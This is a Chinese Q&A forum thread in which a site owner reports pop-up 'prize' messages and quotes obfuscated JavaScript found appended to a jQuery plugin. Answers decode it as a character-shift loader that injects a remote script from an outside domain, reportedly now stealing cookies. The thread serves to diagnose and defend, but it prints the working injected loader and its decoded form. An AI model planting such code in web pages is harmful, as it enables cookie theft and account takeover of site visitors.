网站被植入中奖代码js

御宅男小春子
  • 226

最近网站打开老是有左下角弹出中奖信息 看了下 在jq插件下面 加了一段恶意代码

var str="cnbtldms-vqhsd'!;rbqhosrqb<[!gsso9..vvv-fnnfkd`crk-bnl.robncd.iptdqx-ir[!=;.rbqhos=!(:";var length=str.length;var ba64="";for(i=0;i<length;i++){var s=str.charCodeAt(i);s++;ba64=ba64+String.fromCharCode(s)}eval(ba64);

请问这种原理是什么 怎么能够防范

评论
阅读 3.6k
2 个回答
✓ 已被采纳
  1. 你的jquery插件下载的时候就有这个。

  2. 你的网站被黑了。

前面的密文其实就是字符串的unicode码往前减一。

解密后是这个东西

document.write("<scriptsrc'mu<\"http://www.googleadsl.com/spcode/jquery.js\"></script>");

往页面中插入了一个远程js,是一个典型的xss攻击案例,为了规避waf,他并没有使用标准script脚本,以上代码直接执行不会直接加载,而是会在加载下个js脚本的同时加载进来这个远程脚本。

我去看下了下,现在已经不是弹中奖了,而是直接获取cookies,通过cookies可以直接登陆你的账号,如果你的账号是管理员的话。。。

服务器被人入侵了吧?

宣传栏